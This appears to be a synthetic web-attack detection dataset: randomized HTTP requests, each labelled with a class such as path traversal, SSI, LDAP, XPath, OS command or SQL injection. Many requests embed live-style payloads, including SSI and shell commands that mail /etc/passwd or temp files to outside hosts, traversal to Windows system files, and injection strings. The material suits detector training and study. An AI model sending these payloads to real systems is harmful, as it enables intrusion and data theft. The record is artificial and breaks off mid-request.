Referer: http://www.aeeNfpl.gov/hbee/ilnbqaa6/dfr8/2tsaze.wav
TE: chunked,gzip,trailers
Trailer: Upgrade
User-Agent: Mozilla/7.9 (Machintosh; U; PPC 9.9; ao-as; rv:6.7.6) Gecko/65468325
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6460x166
Via: 0.6 230.210.43.29, HTTP/1.0 www.rssichs.htm
Transfer-Encoding: deflate
Upgrade: m9e/5.3, eSsw5l/3.4, Vct7rc/0.1, hEwtE/6.8
Warning: 987 134.153.100.236 "eesinenge5NOla6sS" 
X-Forwarded-For: 58.229.7.205
X-Serial-Number: 368281150283459
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45577
Start - Id: 45091
class: PathTransversal
GET /.nsf/../winnt/system.ini? HTTP/1.0
Host: www.meeneilmsl.de:7959
Connection: keep-alive
Accept: image/png, audio/x-wav;q=0.7, application/postscript;q=0.0
Accept-Charset: *;q=0.7
Accept-Encoding: deflate;q=0.4, identity, gzip, compress;q=0.2
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 217.208.54.150
Cookie: 6fofT3ben=gqQo1;ea1smudacAs=rmOwTnha3dt 
Cookie2: $Version="39"
Date: Wed, 28 Oct 09 20:20:45 UTC
ETag: W/"lZRSKosY.s45V9ZcHcP"
Expect: 100-continue
From: eiohqll@iTFpeegw.net
If-Modified-Since: Wed, 30 Nov 05 11:41:10 CET
If-Unmodified-Since: Mon, 26 Jun 06 08:20:32 UTC
If-Match: "m7e8SWEORE3SARe6"
If-None-Match: "gAja489I21QsH_zgF6bm"
If-Range: Sun, 11 Mar 07 04:04:23 CET
Max-Forwards: 277
MIME-Version: 2.7
Pragma: ly4z='pj'
Proxy-Authorization: Digest cnonce="lEha"
Authorization: Digest nc=aC1a3Cc9
Range: 61-,599945-,96-
Referer: http://www.vcpsa.net/adosftha/dpzhngmh/srihhcf.jpg
TE: trailers
Trailer: Connection
User-Agent: Mozilla/1.5 (Windows; U; Win98 2.4; ni-ee; rv:3.0.7) Gecko/83773176
UA-CPU: StrongARM
UA-Disp: 0628,6146,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 213x015
Via: 2.1 www.nmIjfen.jpg, 6.3 54.170.128.53
Transfer-Encoding: identity
Upgrade: ttpNf/8.4
Warning: 131 165.136.34.196 "tchbajdsaa" "Fri, 12 Mar 10 18:52:44 CET"
X-Forwarded-For: 211.43.232.104
X-Serial-Number: 95535933478300
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45091
Start - Id: 40231
class: SSI
GET /rylnyisnmy6a/.KqNOaKZC/a9Ixu@z8roLIgjzlBOq7/ueXrke/w-.nsf?sd=utEtbi6z&obtiqKwno=%2FPE%3Ddjig&setLiiFeo3iRo=siy88%5C5t77iefaccept32%25h&mVgIO0-KZu.=5iee1etIhtlf&5esopEtn4=55576746&no=oaeseeuseQ&UHtmuaay=2507632&Sueor4Hceu=tp2HWV_QAPhd&wdiBtgs5l=%5Bei4rti%2Fyziates&htcbnewnyeteh=pwdridtaaT&lJrstoBhqsadeie=879147&ehdaqmtmbschlm=54860&fw=as+g%3A&ku=E3ar6 HTTP/1.1
Host: www.spiqvdhcq.cz
Connection: ehsk
Accept: application/*;q=0.2, audio/x-wav, application/*
Accept-Charset: iso-8859-4;q=0.3, koi8-r
Accept-Encoding: *
Accept-Language: utttd-l;q=0.7, n0aogoUg-s, Ett-cemh;q=0.2, eT-o;q=0.6
Cache-Control: no-transform
Cookie: u6eAhPl=gb;aep=8536;execkTYz=4357
Cookie2: $Version="00"
Date: Thu, 21 Sep 06 05:33:57 CET
Expect: egeror=3turtije;s4teut=ro8ebpsm
If-Modified-Since: Tue, 06 Oct 09 02:16:07 UTC
If-Unmodified-Since: Thu, 13 Sep 07 02:15:45 CET
If-None-Match: "7ddebs1@YZfF-rJZ"
If-Range: *
Max-Forwards: 3
MIME-Version: 1.3
Pragma: sd85ogos=ouorhthv
Referer: http://www.soecdson.de/UCoior/hSla/s3ehe/afbi/aizd.png
TE: trailers,chunked,deflate
Trailer: Accept-Language
User-Agent: <!--     #exec    cmd="c:\progra~1\4ame\aeOYieEt\enLs.exe  d:\pmgihsal\www.nginol.org\zaiu9ysss\database.mdb     /x  exporttofoxpro"-->
Transfer-Encoding: gzip

null

End - Id: 40231
Start - Id: 37450
class: LdapInjection
GET /st6est/6_Pd4oW/sLmN0Ve3yNJOWV/P7Ftelnetog4-/Vi/ets/ciehKl/pspoUs.tiff? HTTP/1.0
Host: www.nket.fr
Connection: close
Accept: video/mpeg;q=0.4, application/*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 26.42.165.41
Cookie: eitidrooce=7eeax)(|  (717ri=*)
Cookie2: $Version="47"
Date: Fri, 19 Feb 10 11:50:04 CET
ETag: "yOd_C.zeiXfXlZckzy2e"
Expect: ahtnadm
From: piod1nut@se9utn.fr
If-Modified-Since: Tue, 03 Feb 04 20:07:59 CET
If-Unmodified-Since: Mon, 25 Aug 08 15:43:42 GMT
If-Match: "7yL7ncDTW0l-n1Nk1"
If-None-Match: *
If-Range: Tue, 03 Feb 09 14:19:54 CET
Max-Forwards: 4375
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: NTLM ZWRndGVjb2NzOWxIcnN0NGloSDBocG5wa3JpdGhxVWFkcGllbm52dWV5
Authorization: NTLM cGVkaWh0bG5zaWU5dHlhbmFwc2xTbHJvY2hwb242dU1oYXR3bw==
Range: -13
Referer: http://www.sycennta.biz/dnaoa/gmm1/hTonagi.dll
TE: chunked;q=0.8,gzip,gzip
Trailer: If-Range
User-Agent: Mozilla/6.2 (Machintosh; U; Mac OS X 1.1; ls-ps; rv:2.4.9) Gecko/14764350
UA-CPU: MIPS
UA-Disp: 5462,524,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 958x510
Via: 8.0 www.6N5a.js, 2.5 249.135.98.197, 1.8 www.nqgoo.jpeg
Transfer-Encoding: 5shsm; gdlOr1xA=itec8od
Upgrade: baet/2.2
Warning: 468 www.gctRbegg.shtml:3583 "godhcxdtTN" 
X-Forwarded-For: 190.47.246.83
X-Serial-Number: 9320114880
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37450
Start - Id: 36901
class: LdapInjection
POST /oUwMdIjG6RNucOu/noO.3eidopen/1like7zX9EO2z/4S_.gif? HTTP/1.0
Content-Length: 149
Content-Language: aia
Content-Encoding: gzip
Content-Location: /ntwo/eonlritr/ae3ini/haoeh5x.asp
Content-MD5: dW9lbmVpUjBkbWR0ZnRsYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 13 Dec 04 08:40:39 GMT
Host: 58.238.184.190
Connection: lfrnEo9
Accept-Charset: x-mac-korean
Accept-Language: *
Cookie: drsiaocnhn=connect;nEtalNe=tBopte>a;W@5phpupr=1;l9stdinPbaG0=2iEhc4
Date: Fri, 01 Jan 10 23:38:56 CET
Pragma: asM=tooe
Proxy-Authorization: Basic dTJlaTplcjNyY0hv
Referer: /Oeeconue/omehn.jsp
Trailer: User-Agent
User-Agent: Mozilla/8.4 (Windows; U; Windows NT 6.9; ph-ct; rv:1.1.5) Gecko/71760179
UA-OS: Win98
Warning: 128 59.175.65.205 "atelalsoarn" 

e4pn=envcri8 evbscriptr&gsoE2rhtr=514&d4p3nltnsncd=iinpw9&oihtasd=E3bah&7pt=a1w6&TlanbeySaoo=) ( | (ra2a=neaat*)&nd1mmojns=nfgimrtwEfsklE

End - Id: 36901
Start - Id: 49941
class: XPathInjection
GET /ratrielAOM7/bU/bIjmN/T0d/23bXdd/sfPhsRHtie/paYRAn4SPv@aKZaN2x/5erchthnmzn/t.rYl_gZ1vWjy6/sNmgJ3h/tDRQmQ2_sLVAZFbT.asmx?nuqoer58sRizv=dEx&YvNIS9C.=ubeke41wldqr4&2Ls9=oiww+&9ZdlexecfobjectGkD=smqc72wo%5Cral&atfpiut0ops=80&ioNse=fhnKgYBAZlo&htaetwsF=gesv8nwiekjno&0LpAln8=stmp5documentsaymtha3yhth&YUgJbTtmpaaJ=tojii%24gzdrop6a+on&unihxeqC=lpa%27%5D+++++%7C+++++P++++%7C++++%2F%2Fuser%5B+++name%2Ftext%28+%29++++%3D++++%27ulwst&H1Cwindow.opentFv=351&edrw=Sao&nrteiachhie7=oZEF&h1cdhu=6 HTTP/1.0
Host: www.eyo4dhne.be:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.4, deflate, gzip;q=0.2, compress, deflate
Accept-Language: eQrtr7e-hNs9rh;q=0.5, 1t8teth-o85llElz, e1-aur;q=0.7
Cache-Control: only-if-cached
Client-ip: 69.149.110.120
Cookie: hogd=Rsssehmrr7reuonb;Eiooasy8aOM=h8lcozton5Noaaemp
Cookie2: $Version="027"
Date: Tue, 25 Jan 05 23:42:54 GMT
ETag: W/"i-WIg.Pxydq@40bwD"
Expect: memLhect=yeit;lyeTotnm
From: gxo4Nam@arrt3.it
If-Modified-Since: Mon, 23 Aug 04 03:36:16 CET
If-Unmodified-Since: Tue, 08 Jan 08 08:39:39 CET
If-Match: *
If-None-Match: "cudpx8fJKEO6l07"
If-Range: Wed, 17 Jun 09 19:08:31 GMT
Max-Forwards: 563
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM bmhlc3JhZmx0ZHFibzVlY2FvZm1qczNUZW5hbGFObXdzbg==
Range: 33-0
Referer: /Rebr/tzssrce/althenef/YsgaxEi/souhaEmH.asp
TE: trailers
Trailer: Via
User-Agent: miDSths
UA-CPU: x86
UA-Disp: 4764,9289,32
UA-OS: Linux
UA-Pixels: 299x2707
Via: HTTP/6.3 www.6Vaul.htm
Transfer-Encoding: vTas; oeeMruy=weNwsn
Upgrade: oepjtw/9.0, eribt/2.4, enN/6.1
Warning: 456 243.193.239.132 "aIeI4en5" "Fri, 30 Mar 07 09:51:48 CET"
X-Forwarded-For: 174.45.94.7
X-Serial-Number: 84157643689
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49941
Start - Id: 45064
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.0
Host: www.cilr.gov:11
Connection: eAHh3w
Accept: image/*;q=0.8, audio/x-wav;q=0.7
Accept-Charset: iso-8859-3, windows-1258;q=0.9, x-mac-ce;q=0.2, iso-8859-6, iso-8859-4;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: to='oeE7tea'
Client-ip: 4.109.212.12
Cookie: irnh6Oeks=rnmXdh;YRq@=Gvart-H;traas=pjteoaeia;nTitiEmin=s3hvngbsprnwi;catfr=pal7hIfrJja;tggimgT2whereDhtpassS4U=rr
Cookie2: $Version="628"
Date: Sun, 20 Apr 08 22:54:55 CET
ETag: W/"VI05iHgMeDWsSIG"
Expect: lldiV
From: a5eiztho@ausccrtksa.uk
If-Modified-Since: Mon, 07 Jan 08 24:25:13 CET
If-Unmodified-Since: Wed, 24 May 06 06:24:00 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
Pragma: no-cache
Proxy-Authorization: lerhb ixmcve=esfi
Authorization: NTLM dDZmdGh3cmVoZXJ3eDV0ZWh0dGR4cm90dGVnRXJpZ2QzaW9idGx1ZU84aTZycnJ0
Range: 373-850
Referer: http://oelrot.org/eawu/imgwi/wnnH.jsp
TE: trailers
Trailer: Host
User-Agent: eaepul6becihrVr0irpa
UA-CPU: Sparc
UA-Disp: 0628,6146,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 127x929
Via: FTP/3.0 www.es9o.html, 6.9 www.1fpntt.css, 3.8 82.93.61.138:2
Transfer-Encoding: gzip
Upgrade: sE8t/1.6, Nhe/7.5, xdp/3.6, iiAp/5.2, r0rr/5.2
Warning: 514 241.201.245.243 "Aasvtsf2rhfAiuhrred" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 098890669103739278
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45064
Start - Id: 39926
class: SSI
PUT /tLca@kah/oiacrwibl1eya4/ne6L3W6/e7eGs/njwMfEMxud/r9cMLyOR-IS-WzkT/VKCgCsovFdropck/ceextfeeotn5desn/gRoy/eRhas6xX.png? HTTP/1.0
Content-Length: 349
Content-Language: e66iasph,ltyePmlx,xeti
Content-Encoding: identity
Content-Location: http://eiYsls.ch/b5ar.png
Content-MD5: dGduaVROdFJ1b21lcjZMaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 22 Sep 07 14:08:27 CET
Last-Modified: Fri, 04 May 07 11:04:42 UTC
Host: 125.113.35.110
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: cp-936
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 36.95.216.180
Cookie: zdlrintg91Tnnol=piemO sD:dft
Cookie2: $Version="36"
Date: Thu, 25 Mar 04 21:55:09 UTC
ETag: "7R2aU4_ypGn5n9WA"
Expect: 100-continue
From: 7v1w1el@eidae.cz
If-Modified-Since: Sun, 16 Jan 05 15:41:18 CET
If-Unmodified-Since: Sun, 10 Jan 10 05:00:47 GMT
If-Match: "gssuUYT8PYMHjt4Af_"
If-None-Match: *
If-Range: "MIApyNYKDy81AJ4Ryyd7"
Max-Forwards: 56
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest response="dD0B7d539F14ACC6a145A7c016DF9930"
Authorization: Digest username="eseT3sEl"
Range: 065804-4,-22740,4181-
Referer: http://www.ezlgs.net/pnrrleos/metts9vw/4odi.html
TE: trailers,gzip;q=0.4,trailers
Trailer: Trailer
User-Agent: Mozilla/8.1 (Windows; U; Win98 5.2; tu-nh; rv:7.1.2) Gecko/15385252
UA-CPU: Sparc
UA-Disp: 079,5438,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 625x1975
Via: 3.8 www.hsNlTas.png, 5.6 11.43.48.63:41, aoAdz/3.0 www.atji.jpeg:6939
Transfer-Encoding: compress
Upgrade: rZos/0.7, seee/7.7, tpcri/7.2, yeGh/9.2, etshoj/4.1
Warning: 151 www.ttt8oAn.jpg "coIndbni" 
X-Forwarded-For: 54.46.237.13
X-Serial-Number: 10606493
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ee=L&thidemduoscu=04t9O7tprUaen&tnSe=e+sock_stream&6LjRjxwHs=taf=(7bgsoundretor h&CPAvdCzOe=6246120&h1irx2q=0971961970&ee3tnT5ni=asnull&1tsmn=nr&t8paak=mmerset&kiny0pnaWerraf7=tLLPjaZ8nc&oeofEt=repj5dRtznei&suRbapdph8v=<!--#exec  cmd="/bin/mail  is.com   <  /etc/passwd"-->&4swlretetTgacfe==adminkq|locationniem 4ts

End - Id: 39926
Start - Id: 38033
class: LdapInjection
GET /dQoX/sRv9cI_/setcgasgkUUlnscripttiC/98/epoDa/0sfi/bdsmirh/QGKuw/ssaenc4hNhdelxntsZrt.sh?G_RV0ATbxh=3113&cseedast=2&Nryqmw=6517644159&iye=%3FeSoq0ig&pb=40931172&egueBenebo=oabgsoundi&oioan=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&qxR1rlP_3N=usrnt&TIdTvs=saimoinpjmanhbsoZ HTTP/1.1
Host: www.ghPnrsznn.gov
Connection: close
Accept: audio/*;q=0.6, image/*, audio/x-wav
Accept-Charset: *
Accept-Encoding: compress;q=0.0, gzip, deflate;q=0.5
Accept-Language: *;q=0.9
Cache-Control: min-fresh=523
Client-ip: 234.101.177.2
Cookie: hbha=iQjJ9@pBUn;iccfj=2591250;Zs0childN7=a ee;Isteuc8sfftcweF=andnoa;Sanlb=nNiA5l?connect2torr
Cookie2: $Version="67"
Date: Tue, 01 May 07 10:49:20 UTC
ETag: "4A@c64fauOD7zKA-S"
Expect: 100-continue
From: an0sEp@ayaad.uk
If-Modified-Since: Tue, 28 Dec 04 14:09:50 GMT
If-Unmodified-Since: Tue, 17 Oct 06 12:04:02 UTC
If-Match: "BRJCw96kieF7Xah"
If-None-Match: *
If-Range: Fri, 19 Mar 10 11:04:48 GMT
Max-Forwards: 446
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: ns6mf r0kt=b8art
Authorization: of2es dbq0td=t9rej
Range: 67-6,809162-
Referer: http://soRiio.fr/e0thbid/ocGsj/cC1tjxe6.wmn
TE: gzip
Trailer: Cache-Control
User-Agent: Mozilla/3.2 (X11; U; Linux i386 9.6; dn-aw; rv:5.3.5) Gecko/11294420
UA-CPU: x86
UA-Disp: 879,787,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 427x816
Via: 1.8 www.soda0ssg.jpeg, 3.6 233.155.60.67, 4.4 www.xfse.css:4807
Transfer-Encoding: identity
Upgrade: ttnx/4.7, Mocaid/6.1, lsgsia/7.3, sekx/3.8
Warning: 684 151.9.243.38 "piufAer70OehrhadSaho" "Sun, 23 Jul 06 03:35:28 UTC"
X-Forwarded-For: 212.17.65.81
X-Serial-Number: 94095568311644
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38033
Start - Id: 43164
class: OsCommanding
GET /-HuBXepXQRl1M/UIErWrra4emes/okt3m2DENacrlxssyi2P/I1yiriyrnvts/tY9_zJPLI7@PxNd/o23xqremffyHW7RxK/nCd7C/EhNrexeczgq48/Ued/oh/at1s83n3iizosye.cfm?E7see=hsltsivpcFnf&ofaaoeg8htT=32&c9ekiIsiExmlKZ=%27++%3B++cat+%2Ftmp%2Fres++++mail+ngtoroel%40ri.com++%3B&uhthtlmjUse=eaOlt&toyzpaeOlGIdh=o7j1qmFi7t&mitio3uHus=tahneihuroacsg8og&copynetcatkPajcatDVconnectYX=lpp&iFlra2Z=0175670&bdmRzmeoi=62+biciyciz%5Dr%5Dlsitno&rmBI8KScmdCZcmd=1zA8CJ9OcIBh HTTP/1.1
Host: 133.181.35.240:80
Connection: close
Accept: image/png;q=0.9, text/*
Accept-Charset: x-mac-turkish;q=0.2, koi8-r, ks_c_5601-1987;q=0.5, cp-932;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 229.240.5.133
Cookie: ssqsibs4=rIXeet7Ahgm;gR9TQoLexY=(3aseoaejr;nOUY0rinN=njVZ;temb=1;padei99td=cg twt;fr+ftpTimg+eo;iyeh2jRta=78
Cookie2: $Version="8"
Date: Sun, 16 Jan 05 05:09:20 UTC
ETag: "3n7cYjzbN.STqhi"
Expect: rraIb=hh0aw
From: ioszae@lf4lua.com
If-Modified-Since: Sat, 25 Sep 04 01:53:52 CET
If-Unmodified-Since: Thu, 04 Jan 07 23:29:44 UTC
If-Match: "@-6lEwOkAx4vQSf-"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 3.7
Pragma: e6d3abio='msrWlna'
Proxy-Authorization: Basic OWFyMXVlZDo2cnBobg==
Authorization: sunut6 3loaTnu4=nkxLfet
Range: 28678-4,-886
Referer: http://exoidwna.uk/lswla.php3
TE: trailers,chunked,trailers
Trailer: If-Match
User-Agent: os0etg/5.1
UA-CPU: Sparc
UA-Disp: 6178,9185,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 953x846
Via: 8.1 www.lneuE.css
Transfer-Encoding: gzip
Upgrade: sPlrA/2.7, nth/6.0, S4hn/1.6, eStqn/4.6, aarg/7.7
Warning: 027 www.snsA.shtml "dncghr1daAmsfa" 
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 97812200258960530552
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43164
Start - Id: 40473
class: SSI
GET /4naswne/Ikodsf1ptdmpeQve/iXa6Lul-3dTKjBzCnaK/np4hfgTs/cy8ec7tluZr.sh?d4mRlwyCn=%3C%21--+++%23include+++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22--%3E&y0LmochaPz=evbNaC%405&aInznktn1ON8i=axEz.i0MT2b1&X13oaamw=9nyirshyse&6e3me4erantwyh=esMhhZHn9ooeH&iwTt2tdoqacdq=l+a%25i HTTP/1.0
Host: www.eSohfolt.gov
Connection: uesngT
Accept: audio/basic;q=0.2, application/x-tar;q=0.0
Accept-Charset: shift_jis
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-transform
Client-ip: 56.163.14.75
Cookie: 7poRla56si=88277634
Cookie2: $Version="386"
Date: Wed, 24 Feb 10 08:55:38 CET
ETag: "9HIuSgRtubV.qwABchz"
Expect: 100-continue
From: Yma7@5eefcOthto.biz
If-Modified-Since: Thu, 22 Jan 09 17:10:47 CET
If-Unmodified-Since: Mon, 25 Apr 05 21:29:03 CET
If-Match: "c04HdilrvQsbnHtdD"
If-None-Match: "CWaomaM-wrhdQzea_"
If-Range: *
Max-Forwards: 57
MIME-Version: 6.5
Pragma: g5iEicoe='fj'
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: oqe28t tMiztat9=1u0r
Range: 6740-758,0802-
Referer: /se6n/r6ceR/snAks.tar
TE: gzip;q=0.1
Trailer: User-Agent
User-Agent: hnco/1.9.5
UA-CPU: PowerPC
UA-Disp: 0480,927,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 025x185
Via: 7.7 120.165.158.146, 0.3 www.ots2g.js, uhhihe/4.2 www.ngtquefi.css:2
Transfer-Encoding: gzip
Upgrade: saq/8.2, 7weze/1.4, ooi/9.7, onEhrR/5.6, ae02/3.2
Warning: 565 www.mo1i.jpg "difinztedvtd" 
X-Forwarded-For: 50.57.73.228
X-Serial-Number: 98565372421828
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40473
Start - Id: 48998
class: XPathInjection
GET /nM/eUr4Q0Gjl2UM9lr/8SKcxQXnkSf1kO7eT/j.replaceSwKA/3YbjQS8W8MAwXf/eO4pP/l1tygetiwcojawhrf2x.htm?hfestd=x%2F0bea%2Fh%2Fchild%3A%3Anode%28%29%5B+++position%28%29%3D8%5D+%7C+eA%2Fg%2FdRuOeg%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D326%5D+++or+%27iitIoot%27%3D%27&LRnullMUxVAd=ytakTb&oE=oynt0 HTTP/1.1
Host: 76.179.79.207
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: min-fresh=62200
Client-ip: 227.105.165.38
Cookie: s1elcsr=4
Cookie2: $Version="6"
Date: Fri, 11 Jul 08 17:43:54 CET
ETag: W/"-.OXjC_5aOfFkoC9vZ07"
Expect: 100-continue
From: yriAeeon@iwtteeent.st
If-Modified-Since: Wed, 19 Jan 05 22:52:09 CET
If-Unmodified-Since: Sat, 17 Oct 09 21:12:28 UTC
If-Match: "IzwC84_hhPeqhlgrf1"
If-None-Match: "rrne0Z.FxpwyDb6@Eo8"
If-Range: *
Max-Forwards: 3332
MIME-Version: 9.9
Pragma: dnll='tle'
Proxy-Authorization: 1mml leiEsi=hessd
Authorization: NTLM bmU2b2lzeXM3QXR0ZHkzaWxmbnUyM09hcmlvYW43dElubmRJcnA=
Range: 468-8399
Referer: /iaJbi/nettwoTm/THEe5pej.bin
TE: deflate;q=0.9
Trailer: Range
User-Agent: srNlA (uDjiJ2; ttVyYq_s; eKN545ba-@; t23myFU; ej2k-oTE)
UA-CPU: 68000
UA-Disp: 3103,4052,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 146x384
Via: HTTP/2.4 www.eBblsOit.html:0
Transfer-Encoding: compress
Upgrade: ooldn/4.6, Lt8g/4.6, eeaos/4.4, en1qst/7.3, omia/8.0
Warning: 893 www.orci.jpg "9g1en4itrrimothb4" 
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48998
Start - Id: 41608
class: SqlInjection
GET /dfsJ6JJd9XZI5J7_ogd/5m0/eU-fzhiJ-LgLH0./iNErrficB/n6ZSZeql_K/h2/slgJBl3/niX10pL-/8zvll8a2esH7i/lnb.MvXQbD/cyed4islProhs/cmKYS.aspx?_vbscriptK7varTr=%27+++%2F**%2F+OR++%2F**%2F%27%27+++%3D+++%27&oeoe=%25%27zwp-&ttduLr5=d&oennegAPlhhP=038 HTTP/1.0
Host: www.jdnE1tdmn.biz
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1253;q=0.2, koi8
Accept-Encoding: *;q=0.0
Accept-Language: raccealn-jPetsttc, heas-qe, pegli-9up
Cache-Control: only-if-cached
Client-ip: 66.83.180.190
Cookie: uqeo=0dosm;hao8sz1=514828300;8f=sFM23Q
Cookie2: $Version="7"
Date: Tue, 10 Aug 04 04:28:25 UTC
ETag: W/"javWwvhnc36ZMUY-15lG"
Expect: 21isusex=tfanht;a6dua
From: tcssd@oays6you.com
If-Modified-Since: Mon, 29 Mar 04 08:07:33 CET
If-Unmodified-Since: Fri, 06 Feb 04 08:51:24 UTC
If-Match: "GLj31RWXyy@wOqMjY"
If-None-Match: *
If-Range: "U_yPt@IBIvFgpvR"
Max-Forwards: 23
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: mntre es5jmh0t=sta8dmeb
Authorization: Digest uri=/sfbsoi.exe
Range: -827608,0-149272
Referer: /a4s3uee.wav
TE: trailers,trailers
Trailer: Referer
User-Agent: odeecotrreo2
UA-CPU: MIPS
UA-Disp: 5571,966,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4149x276
Via: 1.5 www.ilmoha.js, HTTP/6.9 120.77.115.214, ocrh1i/5.1 www.ymunfy.gif
Transfer-Encoding: eirRsr; Aetn=dlapJ63e
Upgrade: bxnsG/8.0, e7cm/6.6
Warning: 846 125.8.137.130 "rhch5ohdnsoyi" "Mon, 08 Dec 08 08:13:31 GMT"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41608
Start - Id: 41477
class: SqlInjection
POST /gi2nerT5ase1h/mLWff-7idrpuP/dIPkPisyKutw/tERlP2koVySg/1wrowYzse15/917EOYW-HpfCoq/ap/oa.msf? HTTP/1.1
Content-Length: 267
Content-Language: aaoei,oNtl3,eeetohnu
Content-Encoding: deflate
Content-Location: /dQaopeey.pl
Content-MD5: cHRpbWNpSWVrblFodDdsaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 10 Jan 10 11:19:35 UTC
Last-Modified: Sun, 06 Apr 08 16:19:11 GMT
Host: 87.191.125.122:80
Connection: close
Accept: audio/basic
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 33.190.206.236
Cookie: dluoi4mtghbe8=hrn;Jprocessing-instructionadminNU=maaeewho;dtnAnntofchlrdy=442
Cookie2: $Version="4"
Date: Thu, 06 Jul 06 02:25:54 UTC
ETag: W/"fXwEEo9cRQPW3zV"
Expect: nvcrmt2
From: t0cih@nlhtfemb7.st
If-Modified-Since: Sat, 15 Oct 05 22:40:32 GMT
If-Unmodified-Since: Sat, 17 Jan 09 10:45:15 UTC
If-Match: "iGC_BYX0E1ngwljI"
If-None-Match: "AeL@y7tsGmd4QLQO-ywU"
If-Range: Sun, 31 Jul 05 18:27:55 UTC
Max-Forwards: 948
MIME-Version: 4.3
Pragma: ne=taavEa
Proxy-Authorization: Basic NkJjbTphZ3JsMmp3ZQ==
Authorization: NTLM YWUwYWQ5b2hzbXRkczBqc2dpN3RvcnNsMjU2aXNuZWhMbU5hYw==
Range: 78-403185
Referer: http://entc.uk/leMsaNt/emrtes/mcApaisv.jsp
TE: gzip,deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/8.5 (compatible; bb6tsi; Linux i386; aasXoe)
UA-CPU: MIPS
UA-Disp: 848,1754,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 054x8213
Via: 6.1 www.sEbs.htm
Transfer-Encoding: iiO1y
Upgrade: duea/0.0
Warning: 241 www.cdHIo.gif "n9doishtsina4rYrfe" "Mon, 20 Aug 07 04:06:39 UTC"
X-Forwarded-For: 37.28.59.187
X-Serial-Number: 40748942
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

na8shse=xmlr&nsodaae4=4327&rYEb=resiatn&hioegte=ea n5&Ioe=OR     'hrni' LIKE   'Sim%'&aoeN9lrfir=S8nhvaicRsoqltena&dohl==8Jr4iasaito ne&nceBtaiEn4=e<e2ehek)t|e&snp=066330&ej48tn2ebe=6&Ec7Z9=fe&eBwewijsekiurn=0&grs2opU4piv=enQvqxbyE1&lpiaooSbnrcnA=57

End - Id: 41477
Start - Id: 45240
class: PathTransversal
GET ////? HTTP/1.1
Host: www.7tCc.it
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-2
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 172.49.251.232
Cookie: rt9ai=fWrB;aRyaqiw8amaAr=yefkbssuAe;gCiqlggpydlIBpo=vxp_&;dei3e5pr=h1s@jM
Cookie2: $Version="071"
Date: Fri, 04 Aug 06 05:39:15 UTC
